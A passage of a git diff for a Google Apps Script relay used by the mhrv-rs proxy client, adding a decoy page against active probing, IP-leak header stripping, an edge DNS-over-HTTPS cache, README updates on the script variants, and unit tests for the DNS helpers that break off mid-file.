+  var sheet = _initCacheSheet();
+  if (sheet) {
+    var totalRows = sheet.getDataRange().getNumRows();
+    if (totalRows > 1) {
+      sheet.getRange(2, 1, totalRows - 1, 8).clearContent();
+    }
+  }
+
+  var metaSheet = _getMetaSheet();
+  if (metaSheet) {
+    metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(2);
+  }
+
+  console.log("Cache wiped. Cursor reset to row 2.");
+}
diff --git a/assets/apps_script/CodeFull.gs b/assets/apps_script/CodeFull.gs
index 77b2a5e5..c40a7dd8 100644
--- a/assets/apps_script/CodeFull.gs
+++ b/assets/apps_script/CodeFull.gs
@@ -16,18 +16,100 @@ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
 const TUNNEL_SERVER_URL = "https://YOUR_TUNNEL_NODE_URL";
 const TUNNEL_AUTH_KEY = "YOUR_TUNNEL_AUTH_KEY";
 
+// Active-probing defense. When false (production default), bad AUTH_KEY
+// requests get a decoy HTML page that looks like a placeholder Apps
+// Script web app instead of the JSON `{"e":"unauthorized"}` body. This
+// makes the deployment indistinguishable from a forgotten-but-public
+// Apps Script project to active scanners that POST malformed payloads
+// looking for proxy endpoints.
+//
+// Set to `true` during initial setup if a misconfigured client is
+// hitting "unauthorized" and you want the explicit JSON error to debug
+// — then flip back to false before the deployment is widely shared.
+// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.)
+const DIAGNOSTIC_MODE = false;
+
+// Connection-level + IP-leak request headers we strip before forwarding
+// to the destination. UrlFetchApp rejects most of the connection-level
+// names anyway, but we also drop the `X-Forwarded-*` / `Forwarded` /
+// `Via` family so that a misconfigured upstream proxy on the user side
+// can't leak the user's real IP through the relay path. Mirrors
+// upstream `masterking32/MasterHttpRelayVPN@3094288`.
 const SKIP_HEADERS = {
   host: 1, connection: 1, "content-length": 1,
   "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
   "priority": 1, te: 1,
+  "x-forwarded-for": 1, "x-forwarded-host": 1, "x-forwarded-proto": 1,
+  "x-forwarded-port": 1, "x-real-ip": 1, "forwarded": 1, "via": 1,
 };
 
+// Methods we consider safe to replay if `UrlFetchApp.fetchAll()` raises.
+// GET/HEAD/OPTIONS are idempotent per RFC 9110; POST/PUT/PATCH/DELETE
+// can have side-effects so we surface the error instead of silently
+// re-firing them.
+const SAFE_REPLAY_METHODS = { GET: 1, HEAD: 1, OPTIONS: 1 };
+
+// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style
+// placeholder page — no proxy-shaped JSON, nothing distinctive enough
+// for a probe to fingerprint as a tunnel endpoint.
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+function _decoyOrError(jsonBody) {
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
+}
+
+// Edge DNS cache. Plain UDP/53 queries normally traverse the full
+// client → GAS → tunnel-node → public resolver path, and the
+// trans-Atlantic round-trip dominates first-hop latency. When
+// ENABLE_EDGE_DNS_CACHE is true, _doTunnelBatch intercepts udp_open
+// ops with port=53, serves the reply from CacheService on a hit, or
+// does its own DoH lookup on a miss from inside Google's network.
+// Cache hits never reach the tunnel-node.
+//
+// Safety property: any failure (parse error, DoH unreachable,
+// CacheService error, refused qtype) returns null from _edgeDnsTry,
+// and the op falls through to the existing tunnel-node forward path.
+// Set false to disable and forward all DNS through the tunnel as
+// before.
+const ENABLE_EDGE_DNS_CACHE = true;
+
+// DoH endpoints tried in order on cache miss. All speak RFC 8484
+// over GET. Apps Script's outbound network peers well to all three.
+const EDGE_DNS_RESOLVERS = [
+  "https://1.1.1.1/dns-query",
+  "https://dns.google/dns-query",
+  "https://dns.quad9.net/dns-query",
+];
+
+// CacheService bounds: 6h max TTL, 100KB per value, ~1000 keys, 250-char keys.
+const EDGE_DNS_MIN_TTL_S = 30;
+const EDGE_DNS_MAX_TTL_S = 21600;   // 6h CacheService ceiling
+// Used for NXDOMAIN/SERVFAIL and the rare "no answer + no SOA in authority"
+// case. NOERROR/NODATA replies normally carry an SOA, and per RFC 2308 §5
+// we honor that SOA's TTL via _dnsMinTtl (the positive path).
+const EDGE_DNS_NEG_TTL_S = 45;
+const EDGE_DNS_CACHE_PREFIX = "edns:";
+// CacheService rejects keys longer than 250 chars. Names approaching the
+// 253-char DNS limit + prefix + qtype digits can exceed that, so we bail
+// before issuing the get/put. The op falls through to the tunnel-node.
+const EDGE_DNS_MAX_KEY_LEN = 240;
+
+// qtypes we refuse to cache and pass through to the tunnel-node:
+//   255 = ANY (resolvers handle it more correctly than we would)
+const EDGE_DNS_REFUSE_QTYPES = { 255: 1 };
+
 // ========================== Entry point ==========================
 
 function doPost(e) {
   try {
     var req = JSON.parse(e.postData.contents);
-    if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" });
+    if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" });
 
     // Tunnel mode
     if (req.t) return _doTunnel(req);
@@ -38,7 +120,9 @@ function doPost(e) {
     // Single relay mode
     return _doSingle(req);
   } catch (err) {
-    return _json({ e: String(err) });
+    // Parse failures of the request body are also probe-shaped — a real
+    // mhrv-rs client never sends invalid JSON. Decoy for the same reason.
+    return _decoyOrError({ e: String(err) });
   }
 }
 
@@ -96,29 +180,102 @@ function _doTunnel(req) {
     .setMimeType(ContentService.MimeType.JSON);
 }
 
-// Batch tunnel: forward all ops in one request to /tunnel/batch
+// Batch tunnel: forward all ops in one request to /tunnel/batch.
+// When ENABLE_EDGE_DNS_CACHE is true, udp_open/port=53 ops are served
+// locally where possible and only the remainder is forwarded.
 function _doTunnelBatch(req) {
-  var payload = {
-    k: TUNNEL_AUTH_KEY,
-    ops: req.ops || [],
-  };
+  var ops = (req && req.ops) || [];
+
+  // Feature off: byte-identical to the pre-feature behavior.
+  if (!ENABLE_EDGE_DNS_CACHE) {
+    return _doTunnelBatchForward(ops);
+  }
+
+  var results = new Array(ops.length);   // sparse: filled by edge-DNS hits
+  var forwardOps = [];
+  var forwardIdx = [];
+
+  for (var i = 0; i < ops.length; i++) {
+    var op = ops[i];
+    if (op && op.op === "udp_open" && op.port === 53 && op.d) {
+      var synth = _edgeDnsTry(op);
+      if (synth) {
+        results[i] = synth;
+        continue;
+      }
+    }
+    forwardOps.push(op);
+    forwardIdx.push(i);
+  }
+
+  // All ops served locally — no tunnel-node round-trip.
+  if (forwardOps.length === 0) {
+    return _json({ r: results });
+  }
+
+  // Nothing was served locally — forward verbatim, no splice needed.
+  if (forwardOps.length === ops.length) {
+    return _doTunnelBatchForward(ops);
+  }
+
+  // Partial: forward the un-served ops and splice results back in place.
+  var resp = _doTunnelBatchFetch(forwardOps);
+  if (resp.error) return _json({ e: resp.error });
+  if (resp.r.length !== forwardOps.length) {
+    // Tunnel-node version skew — bail explicitly rather than silently
+    // route TCP responses to UDP sids.
+    return _json({ e: "tunnel batch length mismatch" });
+  }
+  return _json({ r: _spliceTunnelResults(forwardIdx, resp.r, results) });
+}
 
+// Verbatim forward: no splice, response passed through unchanged.
+function _doTunnelBatchForward(ops) {
   var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", {
     method: "post",
     contentType: "application/json",
-    payload: JSON.stringify(payload),
+    payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }),
     muteHttpExceptions: true,
     followRedirects: true,
   });
-
   if (resp.getResponseCode() !== 200) {
     return _json({ e: "tunnel batch HTTP " + resp.getResponseCode() });
   }
-
   return ContentService.createTextOutput(resp.getContentText())
     .setMimeType(ContentService.MimeType.JSON);
 }
 
+// Forward + parse for the splice path. Returns { r:[...] } on success or
+// { error: "..." } on any failure.
+function _doTunnelBatchFetch(ops) {
+  var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", {
+    method: "post",
+    contentType: "application/json",
+    payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }),
+    muteHttpExceptions: true,
+    followRedirects: true,
+  });
+  if (resp.getResponseCode() !== 200) {
+    return { error: "tunnel batch HTTP " + resp.getResponseCode() };
+  }
+  try {
+    var parsed = JSON.parse(resp.getContentText());
+    return { r: (parsed && parsed.r) || [] };
+  } catch (err) {
+    return { error: "tunnel batch parse error" };
+  }
+}
+
+// Pure helper: writes forwardedResults[j] into allResults[forwardIdx[j]]
+// for each j. Returns the mutated allResults so callers can chain. Pure
+// function — testable without the GAS runtime.
+function _spliceTunnelResults(forwardIdx, forwardedResults, allResults) {
+  for (var j = 0; j < forwardIdx.length; j++) {
+    allResults[forwardIdx[j]] = forwardedResults[j];
+  }
+  return allResults;
+}
+
 // ========================== HTTP relay mode ==========================
 
 function _doSingle(req) {
@@ -136,33 +293,85 @@ function _doSingle(req) {
 
 function _doBatch(items) {
   var fetchArgs = [];
+  var fetchIndex = [];
+  var fetchMethods = [];
   var errorMap = {};
   for (var i = 0; i < items.length; i++) {
     var item = items[i];
+    if (!item || typeof item !== "object") {
+      errorMap[i] = "bad item";
+      continue;
+    }
     if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) {
       errorMap[i] = "bad url";
       continue;
     }
-    var opts = _buildOpts(item);
-    opts.url = item.u;
-    fetchArgs.push({ _i: i, _o: opts });
+    try {
+      var opts = _buildOpts(item);
+      opts.url = item.u;
+      fetchArgs.push(opts);
+      fetchIndex.push(i);
+      fetchMethods.push(String(item.m || "GET").toUpperCase());
+    } catch (buildErr) {
+      errorMap[i] = String(buildErr);
+    }
   }
+
+  // fetchAll() runs all requests in parallel inside Google. If it
+  // throws as a whole (e.g. one URL violates UrlFetchApp limits and
+  // poisons the whole batch), degrade to per-item fetch so a single
+  // bad request does not zero out the entire batch's responses.
+  // Mirrors upstream `masterking32/MasterHttpRelayVPN@3094288`.
   var responses = [];
   if (fetchArgs.length > 0) {
-    responses = UrlFetchApp.fetchAll(fetchArgs.map(function(x) { return x._o; }));
+    try {
+      responses = UrlFetchApp.fetchAll(fetchArgs);
+    } catch (fetchAllErr) {
+      responses = [];
+      for (var j = 0; j < fetchArgs.length; j++) {
+        try {
+          if (!SAFE_REPLAY_METHODS[fetchMethods[j]]) {
+            errorMap[fetchIndex[j]] =
+              "batch fetchAll failed; unsafe method not replayed";
+            responses[j] = null;
+            continue;
+          }
+          var fallbackReq = fetchArgs[j];
+          var fallbackUrl = fallbackReq.url;
+          var fallbackOpts = {};
+          for (var key in fallbackReq) {
+            if (
+              Object.prototype.hasOwnProperty.call(fallbackReq, key) &&
+              key !== "url"
+            ) {
+              fallbackOpts[key] = fallbackReq[key];
+            }
+          }
+          responses[j] = UrlFetchApp.fetch(fallbackUrl, fallbackOpts);
+        } catch (singleErr) {
+          errorMap[fetchIndex[j]] = String(singleErr);
+          responses[j] = null;
+        }
+      }
+    }
   }
+
   var results = [];
   var rIdx = 0;
   for (var i = 0; i < items.length; i++) {
-    if (errorMap.hasOwnProperty(i)) {
+    if (Object.prototype.hasOwnProperty.call(errorMap, i)) {
       results.push({ e: errorMap[i] });
     } else {
       var resp = responses[rIdx++];
-      results.push({
-        s: resp.getResponseCode(),
-        h: _respHeaders(resp),
-        b: Utilities.base64Encode(resp.getContent()),
-      });
+      if (!resp) {
+        results.push({ e: "fetch failed" });
+      } else {
+        results.push({
+          s: resp.getResponseCode(),
+          h: _respHeaders(resp),
+          b: Utilities.base64Encode(resp.getContent()),
+        });
+      }
     }
   }
   return _json({ q: results });
@@ -203,13 +412,17 @@ function _respHeaders(resp) {
   return resp.getHeaders();
 }
 
+// `doGet` is what active scanners hit first (HTTP GET probes are cheaper
+// than POSTs). We use ContentService here so the response body is the
+// raw HTML we wrote — `HtmlService.createHtmlOutput` would wrap it in
+// a `goog.script.init` sandbox iframe, which the Rust client would then
+// see if it ever GET-followed a redirect back onto /macros/.../exec
+// (decoy/no-json error path). ContentService keeps the doGet response
+// indistinguishable from a forgotten static-HTML web app.
 function doGet(e) {
-  return HtmlService.createHtmlOutput(
-    "<!DOCTYPE html><html><head><title>My App</title></head>" +
-      '<body style="font-family:sans-serif;max-width:600px;margin:40px auto">' +
-      "<h1>Welcome</h1><p>This application is running normally.</p>" +
-      "</body></html>"
-  );
+  return ContentService
+    .createTextOutput(DECOY_HTML)
+    .setMimeType(ContentService.MimeType.HTML);
 }
 
 function _json(obj) {
@@ -217,3 +430,205 @@ function _json(obj) {
     ContentService.MimeType.JSON
   );
 }
+
+// ========================== Edge DNS helpers ==========================
+
+// Tries to serve a single udp_open DNS op from CacheService or DoH.
+// Returns a synthesized batch-result {sid, pkts, eof} on success, or null
+// on any failure / unsupported case so the caller can forward to the
+// tunnel-node. Null is the safe default — every error path returns null.
+function _edgeDnsTry(op) {
+  try {
+    var bytes = Utilities.base64Decode(op.d);
+    if (!bytes || bytes.length < 12) return null;
+
+    var q = _dnsParseQuestion(bytes);
+    if (!q) return null;
+    if (EDGE_DNS_REFUSE_QTYPES[q.qtype]) return null;
+
+    var key = EDGE_DNS_CACHE_PREFIX + q.qtype + ":" + q.qname;
+    if (key.length > EDGE_DNS_MAX_KEY_LEN) return null;
+    var cache = CacheService.getScriptCache();
+
+    var stored = null;
+    try { stored = cache.get(key); } catch (_) {}
+    if (stored) {
+      try {
+        var hit = Utilities.base64Decode(stored);
+        if (hit && hit.length >= 12) {
+          // Rewrite txid to match this query (RFC 1035 §4.1.1).
+          var rewritten = _dnsRewriteTxid(hit, q.txid);
+          return {
+            sid: "edns-cache",
+            pkts: [Utilities.base64Encode(rewritten)],
+            eof: true,
+          };
+        }
+      } catch (_) { /* corrupt cache entry — fall through to DoH */ }
+    }
+
+    for (var i = 0; i < EDGE_DNS_RESOLVERS.length; i++) {
+      var reply = _edgeDnsDoh(EDGE_DNS_RESOLVERS[i], bytes);
+      if (!reply) continue;
+
+      var rcode = reply[3] & 0x0F;
+      var ttl;
+      if (rcode === 2 || rcode === 3) {
+        ttl = EDGE_DNS_NEG_TTL_S;
+      } else {
+        var minTtl = _dnsMinTtl(reply);
+        ttl = (minTtl === null) ? EDGE_DNS_NEG_TTL_S : minTtl;
+        if (ttl < EDGE_DNS_MIN_TTL_S) ttl = EDGE_DNS_MIN_TTL_S;
+        if (ttl > EDGE_DNS_MAX_TTL_S) ttl = EDGE_DNS_MAX_TTL_S;
+      }
+
+      try {
+        cache.put(key, Utilities.base64Encode(reply), ttl);
+      } catch (_) {
+        // >100KB value or transient quota — still return the live answer.
+      }
+
+      // The DoH reply already echoes our query's txid; rewrite defensively
+      // in case a resolver mangles it.
+      var fixed = _dnsRewriteTxid(reply, q.txid);
+      return {
+        sid: "edns-doh",
+        pkts: [Utilities.base64Encode(fixed)],
+        eof: true,
+      };
+    }
+    return null;
+  } catch (err) {
+    return null;
+  }
+}
+
+// Single DoH GET against `url`. Returns the reply as a byte array, or null
+// on any failure (HTTP non-200, network error, malformed body).
+function _edgeDnsDoh(url, queryBytes) {
+  try {
+    var dns = Utilities.base64EncodeWebSafe(queryBytes).replace(/=+$/, "");
+    var resp = UrlFetchApp.fetch(url + "?dns=" + dns, {
+      method: "get",
+      muteHttpExceptions: true,
+      followRedirects: true,
+      headers: { accept: "application/dns-message" },
+    });
+    if (resp.getResponseCode() !== 200) return null;
+    var body = resp.getContent();
+    if (!body || body.length < 12) return null;
+    return body;
+  } catch (err) {
+    return null;
+  }
+}
+
+// Returns { txid, qname, qtype } from a DNS wire-format query.
+// qname is lowercased and dot-joined (no trailing dot). Null on malformed.
+function _dnsParseQuestion(bytes) {
+  if (bytes.length < 12) return null;
+  var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF);
+  // RFC ambiguity: multi-question queries are essentially unused in
+  // practice and would mis-key the cache (we'd cache a multi-answer reply
+  // under only the first question). Bail and let the tunnel-node handle it.
+  if (qdcount !== 1) return null;
+
+  var off = 12;
+  var labels = [];
+  var nameLen = 0;
+  while (off < bytes.length) {
+    var len = bytes[off] & 0xFF;
+    if (len === 0) { off++; break; }
+    if ((len & 0xC0) !== 0) return null;   // questions don't use compression
+    if (len > 63) return null;
+    off++;
+    if (off + len > bytes.length) return null;
+    var label = "";
+    for (var i = 0; i < len; i++) {
+      var c = bytes[off + i] & 0xFF;
+      if (c >= 0x41 && c <= 0x5A) c += 0x20;   // ASCII lowercase
+      label += String.fromCharCode(c);
+    }
+    labels.push(label);
+    off += len;
+    nameLen += len + 1;
+    if (nameLen > 255) return null;
+  }
+  if (off + 4 > bytes.length) return null;
+  var qtype = ((bytes[off] & 0xFF) << 8) | (bytes[off + 1] & 0xFF);
+
+  return {
+    txid: ((bytes[0] & 0xFF) << 8) | (bytes[1] & 0xFF),
+    qname: labels.join("."),
+    qtype: qtype,
+  };
+}
+
+// Walks the DNS reply's answer + authority sections and returns the min RR
+// TTL, or null if there are no RRs (caller treats null as "use neg TTL").
+// Returns null on any malformed input.
+function _dnsMinTtl(bytes) {
+  if (bytes.length < 12) return null;
+  var qdcount = ((bytes[4] & 0xFF) << 8) | (bytes[5] & 0xFF);
+  var ancount = ((bytes[6] & 0xFF) << 8) | (bytes[7] & 0xFF);
+  var nscount = ((bytes[8] & 0xFF) << 8) | (bytes[9] & 0xFF);
+
+  var off = 12;
+  for (var q = 0; q < qdcount; q++) {
+    off = _dnsSkipName(bytes, off);
+    if (off < 0 || off + 4 > bytes.length) return null;
+    off += 4;
+  }
+
+  var min = null;
+  var rrTotal = ancount + nscount;
+  for (var r = 0; r < rrTotal; r++) {
+    off = _dnsSkipName(bytes, off);
+    if (off < 0 || off + 10 > bytes.length) return null;
+    // 2B type, 2B class, 4B TTL, 2B rdlength
+    var ttl = ((bytes[off + 4] & 0xFF) * 0x1000000)
+            + (((bytes[off + 5] & 0xFF) << 16)
+            |  ((bytes[off + 6] & 0xFF) << 8)
+            |   (bytes[off + 7] & 0xFF));
+    // RFC 2181: TTLs are 32-bit unsigned; values with the top bit set are
+    // treated as 0. Multiplying the high byte (instead of <<24) avoids V8
+    // sign-extension and keeps `ttl` in [0, 2^32).
+    if (ttl < 0 || ttl > 0x7FFFFFFF) ttl = 0;
+    if (min === null || ttl < min) min = ttl;
+    var rdlen = ((bytes[off + 8] & 0xFF) << 8) | (bytes[off + 9] & 0xFF);
+    off += 10 + rdlen;
+    if (off > bytes.length) return null;
+  }
+  return min;
+}
+
+// Advances past a DNS name (sequence of labels or 16-bit pointer).
+// Returns the new offset, or -1 on malformed input.
+function _dnsSkipName(bytes, off) {
+  while (off < bytes.length) {
+    var len = bytes[off] & 0xFF;
+    if (len === 0) return off + 1;
+    if ((len & 0xC0) === 0xC0) {
+      if (off + 2 > bytes.length) return -1;
+      return off + 2;   // pointer terminates the name in-place
+    }
+    if ((len & 0xC0) !== 0) return -1;   // reserved label type
+    if (len > 63) return -1;
+    off += 1 + len;
+  }
+  return -1;
+}
+
+// Returns a copy of `bytes` with the first 2 bytes overwritten by the
+// big-endian 16-bit transaction id. Coerces to signed-byte range so the
+// result round-trips through Utilities.base64Encode regardless of whether
+// the runtime exposes bytes as signed Java int8 or unsigned JS numbers.
+function _dnsRewriteTxid(bytes, txid) {
+  var out = [];
+  for (var i = 0; i < bytes.length; i++) out.push(bytes[i]);
+  var hi = (txid >> 8) & 0xFF;
+  var lo = txid & 0xFF;
+  out[0] = hi > 127 ? hi - 256 : hi;
+  out[1] = lo > 127 ? lo - 256 : lo;
+  return out;
+}
diff --git a/assets/apps_script/README.md b/assets/apps_script/README.md
index 1cf339a2..6af81d64 100644
--- a/assets/apps_script/README.md
+++ b/assets/apps_script/README.md
@@ -1,13 +1,18 @@
-# Apps Script source (mirrored)
+# Apps Script source
 
-The file `Code.gs` next to this README is a verbatim snapshot of the upstream script you deploy in your own Google Apps Script project:
+Three deploy-ready Apps Script files live here. They all speak the same `{k, m, u, h, b, ct, r}` wire protocol with `mhrv-rs`, so the client just points its `script_id` at whichever deployment you want — no mode change required.
 
-- Upstream: <https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs>
-- Raw link: <https://raw.githubusercontent.com/masterking32/MasterHttpRelayVPN/refs/heads/python_testing/apps_script/Code.gs>
+## Variants and origins
 
-This copy lives in our repo for two reasons:
+- **`Code.gs`** — standard relay. **Verbatim mirror of upstream.** Apps Script does the outbound fetch itself. This is the default choice for most users.
+  - Upstream: <https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs>
+  - Credit: [@masterking32](https://github.com/masterking32). We do not modify this file.
+  - The mirror lives here so that (a) users on networks where `raw.githubusercontent.com` is unreachable can still deploy from a `git clone` / ZIP, and (b) we have a snapshot to diff against if upstream changes silently break the informal relay protocol.
 
-1. **Survives upstream outages**: if the user is on a network where raw.githubusercontent.com is temporarily unreachable but they can clone or ZIP this repo, they still have the deploy-ready file.
-2. **Pins what we tested against**: the relay protocol between `mhrv-rs` and the script is informal; upstream changes can silently break us. Keeping a snapshot here lets us diff and see if a spec drift is responsible for any reported breakage.
+- **`CodeFull.gs`** — superset of `Code.gs` that additionally proxies raw-TCP / UDP via `tunnel-node` (used by `mode: "full"`). **Maintained in this repo** — written for this Rust port and not present upstream. Deploy this if you want full-tunnel mode; details in the file's header comment.
 
-All credit for `Code.gs` goes to [@masterking32](https://github.com/masterking32) — we do not modify it. If you're using mhrv-rs, follow the upstream deploy instructions in the script's header comment. The only edit **you** must make is the `AUTH_KEY` constant — set it to a strong secret and reuse that exact string in your `mhrv-rs` config.
+- **`Code.cfw.gs`** — Apps Script becomes a thin auth+forward layer; the actual outbound fetch happens on a Cloudflare Worker you also deploy ([`assets/cloudflare/`](../cloudflare/)). **Derivative work — not unmodified upstream.** The pattern of forwarding through a Cloudflare Worker came from [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw); this file inherits hardening from `Code.gs` (decoy-on-bad-auth, fail-closed sentinels) and adds chunked batch forwarding (`Promise.all` on the Worker side, `ceil(N/40)` GAS calls per batch) that the upstream `mhr-cfw` does not have. Faster per-call latency, worse YouTube long-form, no fix for Cloudflare anti-bot. Read [`assets/cloudflare/README.md`](../cloudflare/README.md) before choosing this one.
+
+## What you must edit before deploying
+
+For every variant: change `AUTH_KEY` from its placeholder to a strong secret, and use that same string in your `mhrv-rs` config's `auth_key`. `Code.cfw.gs` additionally requires setting `WORKER_URL` to your deployed Cloudflare Worker URL; `CodeFull.gs` additionally requires `TUNNEL_SERVER_URL` and `TUNNEL_AUTH_KEY` for the tunnel-node leg.
diff --git a/assets/apps_script/tests/edge_dns_test.js b/assets/apps_script/tests/edge_dns_test.js
new file mode 100644
index 00000000..f59c7576
--- /dev/null
+++ b/assets/apps_script/tests/edge_dns_test.js
@@ -0,0 +1,212 @@
+// Pure-JS sanity tests for the edge DNS cache helpers in CodeFull.gs.
+//
+// Run from repo root:  node assets/apps_script/tests/edge_dns_test.js
+//
+// The tests extract the helpers that don't depend on the GAS runtime
+// (Utilities, CacheService, UrlFetchApp) and exercise them against
+// crafted DNS wire-format payloads. They catch the bugs most likely to
+// regress when editing the parser: txid handling, name-pointer
+// compression, TTL sign-extension, splice ordering with mixed batches.
+
+'use strict';
+
+const fs = require('fs');
+const path = require('path');
+
+const SRC = path.join(__dirname, '..', 'CodeFull.gs');
+const src = fs.readFileSync(SRC, 'utf8');
+
+// Extract pure-JS helpers and eval them in a shared scope so cross-refs
+// (_dnsMinTtl → _dnsSkipName) resolve.
+const NAMES = [
+  '_dnsSkipName',
+  '_dnsParseQuestion',
+  '_dnsMinTtl',
+  '_dnsRewriteTxid',
+  '_spliceTunnelResults',
+];
+let bundle = '';
+for (const name of NAMES) {
+  const re = new RegExp(`function ${name}\\b[\\s\\S]*?\\n\\}\\n`, 'g');
+  const m = src.match(re);
+  if (!m) throw new Error('helper not found in CodeFull.gs: ' + name);
+  bundle += m[0] + '\n';
+}
+bundle += `return { ${NAMES.join(', ')} };`;
+// eslint-disable-next-line no-new-func
+const ctx = new Function(bundle)();
+
+let passed = 0;
+function ok(label) { console.log('  ok'); passed++; }
+function check(label, cond, detail) {
+  if (!cond) {
+    console.error('FAIL: ' + label + (detail ? ' — ' + detail : ''));
+    process.exit(1);
+  }
+}
+
+// --- 1. parse a query for example.com A ---
+const q1 = Buffer.from([
+  0x12, 0x34,                                               // txid
+  0x01, 0x00,                                               // flags: RD=1
+  0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,           // counts
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,           // "example"
+  0x03, 0x63, 0x6f, 0x6d, 0x00,                             // "com" 0
+  0x00, 0x01, 0x00, 0x01,                                   // qtype=A, qclass=IN
+]);
+console.log('TEST 1 query parse');
+const r1 = ctx._dnsParseQuestion(q1);
+check('txid',  r1.txid  === 0x1234, r1 && r1.txid.toString(16));
+check('qname', r1.qname === 'example.com', r1 && r1.qname);
+check('qtype', r1.qtype === 1);
+ok();
+
+// --- 2. case-fold (DNS names are case-insensitive on the wire) ---
+const q2 = Buffer.from([
+  0xab, 0xcd, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x45, 0x58, 0x41, 0x4d, 0x50, 0x4c, 0x45,           // "EXAMPLE"
+  0x03, 0x43, 0x4f, 0x4d, 0x00,                             // "COM" 0
+  0x00, 0x1c, 0x00, 0x01,                                   // qtype=AAAA(28)
+]);
+console.log('TEST 2 case-fold to lowercase');
+const r2 = ctx._dnsParseQuestion(q2);
+check('lowercased qname', r2.qname === 'example.com', r2 && r2.qname);
+check('qtype AAAA',       r2.qtype === 28);
+ok();
+
+// --- 3. txid rewrite preserves all other bytes ---
+console.log('TEST 3 txid rewrite is byte-identical except [0..1]');
+const rewritten = ctx._dnsRewriteTxid(q1, 0xdead);
+check('hi byte',    (rewritten[0] & 0xFF) === 0xde);
+check('lo byte',    (rewritten[1] & 0xFF) === 0xad);
+check('length',     rewritten.length === q1.length);
+for (let i = 2; i < q1.length; i++) {
+  check('byte ' + i + ' unchanged', (rewritten[i] & 0xFF) === q1[i]);
+}
+check('source not mutated (cache safety)',
+  q1[0] === 0x12 && q1[1] === 0x34, 'source bytes 0..1 = ' + q1[0] + ',' + q1[1]);
+ok();
+
+// --- 4. min-TTL extraction with answer name-pointer compression ---
+const reply4 = Buffer.from([
+  0x12, 0x34, 0x81, 0x80,
+  0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,
+  0x03, 0x63, 0x6f, 0x6d, 0x00,
+  0x00, 0x01, 0x00, 0x01,
+  0xc0, 0x0c,                                               // pointer to QNAME
+  0x00, 0x01, 0x00, 0x01,
+  0x00, 0x00, 0x01, 0x2c,                                   // TTL=300
+  0x00, 0x04,
+  0x5d, 0xb8, 0xd8, 0x22,                                   // 93.184.216.34
+]);
+console.log('TEST 4 reply min-TTL (answer with pointer)');
+check('TTL=300', ctx._dnsMinTtl(reply4) === 300);
+ok();
+
+// --- 5. NXDOMAIN with SOA in authority — TTL comes from authority RR ---
+const soa = Buffer.from([
+  0x02, 0x6e, 0x73, 0x04, 0x74, 0x65, 0x73, 0x74, 0x00,     // mname "ns.test."
+  0x0a, 0x68, 0x6f, 0x73, 0x74, 0x6d, 0x61, 0x73, 0x74, 0x65, 0x72,
+  0x04, 0x74, 0x65, 0x73, 0x74, 0x00,                        // rname
+  0x00, 0x00, 0x00, 0x01,
+  0x00, 0x00, 0x00, 0x02,
+  0x00, 0x00, 0x00, 0x03,
+  0x00, 0x00, 0x00, 0x04,
+  0x00, 0x00, 0x00, 0x05,
+]);
+const nxHeader = Buffer.from([
+  0x12, 0x34, 0x81, 0x83,                                   // RCODE=3
+  0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+  0x07, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6e, 0x67,           // "missing"
+  0x04, 0x74, 0x65, 0x73, 0x74, 0x00,                        // "test"
+  0x00, 0x01, 0x00, 0x01,
+]);
+const authRR = Buffer.concat([
+  Buffer.from([0xc0, 0x14]),                                 // pointer to "test"
+  Buffer.from([0x00, 0x06, 0x00, 0x01]),                    // SOA / IN
+  Buffer.from([0x00, 0x00, 0x00, 0x3c]),                    // TTL=60
+  Buffer.from([0x00, soa.length]),
+  soa,
+]);
+const nxReply = Buffer.concat([nxHeader, authRR]);
+console.log('TEST 5 NXDOMAIN: rcode + SOA TTL parse');
+check('rcode 3', (nxReply[3] & 0x0F) === 3);
+check('soa TTL 60', ctx._dnsMinTtl(nxReply) === 60);
+ok();
+
+// --- 6. malformed (truncated header) → null ---
+console.log('TEST 6 truncated input rejected');
+check('null', ctx._dnsParseQuestion(Buffer.from([0x00, 0x00, 0x01])) === null);
+ok();
+
+// --- 7. illegal pointer in question section → null ---
+const q7 = Buffer.from([
+  0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0xc0, 0x0c,                                               // illegal in question
+  0x00, 0x01, 0x00, 0x01,
+]);
+console.log('TEST 7 reject compression in question');
+check('null', ctx._dnsParseQuestion(q7) === null);
+ok();
+
+// --- 8. TTL with high bit set is clamped to 0 (RFC 2181 §8) ---
+// Build a minimal A reply where the answer's 4-byte TTL field is 0x80000000.
+const reply8 = Buffer.from([
+  0x12, 0x34, 0x81, 0x80,
+  0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
+  0x07, 0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65,
